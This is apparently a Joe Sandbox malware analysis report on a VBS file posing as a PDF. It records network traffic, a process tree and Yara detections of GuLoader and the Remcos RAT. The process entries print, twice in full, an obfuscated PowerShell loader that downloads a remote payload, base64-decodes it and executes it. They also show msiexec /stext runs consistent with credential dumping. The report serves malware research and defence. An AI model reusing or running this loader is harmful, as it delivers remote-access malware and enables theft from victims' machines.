                                                                                                        Oct 10, 2024 08:57:59.210630894 CEST1236INData Raw: ff 1c 10 ea c5 a7 46 49 9d cb 2f b0 3d ef 9d 0e 4f a2 a4 a6 c3 ce 79 38 e6 87 22 a0 3c ae a3 dd 17 de af 2c b6 bc a0 ad 63 c0 f9 f0 3a d1 91 1c ed bd 1c 3b 8f 50 a6 b4 a3 3f 65 4f ed 1c dd bb b4 25 6f 65 2e da e1 ee 5b 19 1d 45 63 0f 38 e5 ba c2
                                                                                                        Data Ascii: FI/=Oy8"<,c:;P?eO%oe.[Ec8;.0`w*`C2/*f[?{Hg(N)eVC.b!xkFwQ/]<)MCK1cS:F3YL;X0m2sF*m
                                                                                                        Oct 10, 2024 08:57:59.210652113 CEST1236INData Raw: 21 07 f7 ae b1 55 9b 28 ea e4 47 61 4b 2d b4 f8 7d 22 bc e0 b3 df 45 73 f5 ad 63 b6 d4 c8 20 92 ca 49 2d da b9 c7 78 67 b8 94 68 fb 78 aa 28 14 be 66 48 20 14 c6 2d 90 01 60 ff 65 85 12 ab dd 4d 6e d3 23 93 5d 75 48 19 8d 43 ba 55 0b d9 32 cc 0f
                                                                                                        Data Ascii: !U(GaK-}"Esc I-xghx(fH -`eMn#]uHCU2_yun/Qs!O4T(J/c$#asZ<6oHHaD>|:.^ld.-17-GrEw_xZ%oG#Af
                                                                                                        Oct 10, 2024 08:57:59.210666895 CEST1236INData Raw: ca 2d cd f6 04 6b df 94 a5 be 49 65 1a 75 a1 e2 1d 5c 95 f8 07 a3 60 9f 0e 40 2b a8 24 6c 0b 93 b9 f6 ff e4 b0 19 20 42 6e 25 0e f9 07 e0 22 cb 63 df a8 c1 73 9d 00 67 14 af fb ee 19 c2 d6 1b 51 36 a8 14 6f a7 a2 87 ec 61 e0 9b 86 2f 72 be 53 be
                                                                                                        Data Ascii: -kIeu\`@+$l Bn%"csgQ6oa/rS;;qcm+ql;(L@1Je4>ODNiCSd_P!/Na]X5.*cXSIPM+b[d|S'fw:>SQ/-X<DnP{o3^q|w
                                                                                                        Oct 10, 2024 08:57:59.210681915 CEST1236INData Raw: 87 fd f2 ae 5a 91 78 94 9a 53 8e d4 55 d6 82 00 0b 6d 78 8b 95 8d 6f 3e 51 c5 65 a7 95 ca a2 4a fc 66 8d cf 63 42 6e 22 3a af 41 22 fc 49 cc 89 e9 82 76 0c 97 ae df 25 a2 74 60 71 9c f4 e8 e1 f6 a8 46 64 f9 ae dd f4 28 c8 84 37 76 57 8c c1 8a d4
                                                                                                        Data Ascii: ZxSUmxo>QeJfcBn":A"Iv%t`qFd(7vW$I~d`A<]TJ\H+EjJ''V-~a. p{"j\[?XoN<ml6~l<kg?hNz;Soze:
                                                                                                        Oct 10, 2024 08:57:59.215584040 CEST1236INData Raw: 61 db c7 f9 f3 d8 c6 36 1f 2a 91 29 67 79 d2 15 3b b7 0c 62 40 f4 ed be 43 57 d7 c7 55 cb 5b 38 8a 7b 46 76 b2 e0 64 71 eb 90 e6 3a 18 43 ed 61 38 89 19 92 86 41 06 d6 fd 95 a6 b5 1d 55 30 3f bf 36 ad bc ad 2c 40 e3 51 d7 46 f6 3a 6c 7c 0e 94 5e
                                                                                                        Data Ascii: a6*)gy;b@CWU[8{Fvdq:Ca8AU0?6,@QF:l|^V@O=Da6AJ|TXp$][4 z8>ha<r^K?,S>@{MGzK]"viItfhFsgDf7KZn#VuHLz).G


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.449740178.237.33.50803808C:\Windows\SysWOW64\msiexec.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 08:58:02.117845058 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                        Host: geoplugin.net
                                                                                                        Cache-Control: no-cache
                                                                                                        Oct 10, 2024 08:58:02.722609043 CEST1170INHTTP/1.1 200 OK
                                                                                                        date: Thu, 10 Oct 2024 06:58:02 GMT
                                                                                                        server: Apache
                                                                                                        content-length: 962
                                                                                                        content-type: application/json; charset=utf-8
                                                                                                        cache-control: public, max-age=300
                                                                                                        access-control-allow-origin: *
                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:02:57:17
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
                                                                                                        Imagebase:0x7ff7d97b0000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:02:57:20
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;"
                                                                                                        Imagebase:0x7ff788560000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:02:57:20
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:02:57:30
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;"
                                                                                                        Imagebase:0x180000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2058181579.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2058610754.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:02:57:30
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:02:57:48
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                        Imagebase:0xde0000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:9
                                                                                                        Start time:02:58:03
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
                                                                                                        Imagebase:0x910000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:02:58:03
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
                                                                                                        Imagebase:0x910000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:11
                                                                                                        Start time:02:58:03
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
                                                                                                        Imagebase:0x910000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:02:58:03
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
                                                                                                        Imagebase:0x910000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:02:58:03
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"
                                                                                                        Imagebase:0x910000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Reset < >
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.1919388869.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H9MX
                                                                                                          • API String ID: 0-1949931871
                                                                                                          • Opcode ID: c8ec88cfe9dae0899445175919730d71b364256e9155d2adc42ee19b3b58ff8d
